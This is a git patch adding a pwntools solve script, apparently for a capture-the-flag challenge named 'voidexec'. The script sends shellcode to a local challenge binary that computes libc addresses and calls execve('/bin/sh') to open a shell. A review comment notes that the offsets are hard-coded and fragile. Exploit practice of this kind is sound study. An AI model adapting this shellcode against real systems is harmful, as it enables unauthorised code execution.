From af72710a3563e6da3ce7e979fd6ddbe2bc7df9c6 Mon Sep 17 00:00:00 2001
From: jc
Date: Fri, 21 Mar 2025 08:10:23 +0300
Subject: [PATCH] solve script
---
random_challs/voidexec/a.py | 27 +++++++++++++++++++++++++++
1 file changed, 27 insertions(+)
create mode 100644 random_challs/voidexec/a.py
diff --git a/random_challs/voidexec/a.py b/random_challs/voidexec/a.py
new file mode 100644
index 0000000..0264e0f
--- /dev/null
+++ b/random_challs/voidexec/a.py
@@ -0,0 +1,27 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./voidexec", checksec=False)
+libc = target.libc
+r = process()
+
+# funcs
+s = lambda a: r.send(a)
+
+# shellcode
+sc = f"""
+xor rsi, rsi
+xor rdx, rdx
+mov r9, [rsp+32]
+sub r9, {libc.sym.__libc_start_call_main+128}
+mov rdi, r9
+add rdi, {next(libc.search(b"/bin/sh\0"))}
+mov r15, r9
+add r15, {libc.sym.execve}
+call r15
+"""
+sc = asm(sc)
+s(sc)
+
+r.interactive()
\ No newline at end of file
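Review bot: The two magic numbers in the shellcode string, `[rsp+32]` and `__libc_start_call_main+128`, are undocumented and hold only for one glibc build and one stack layout at the moment the payload runs; on any other build the computed base is silently wrong. `__libc_start_call_main` is also a local (non-exported) symbol in glibc, so `libc.sym` will most likely fail to resolve it on a stripped library and the f-string raises before anything is sent. I would add a comment above `sc = f"""` along the lines of `# [rsp+32] is assumed to hold the return address into __libc_start_call_main (+128 on the libc this was written against); re-check both offsets on any other build`, and record the libc version the offsets were taken from. The `# funcs` and `# shellcode` comments only label the sections, and the commit message gives no context for the challenge, so a short module docstring stating what the script targets would help the next reader.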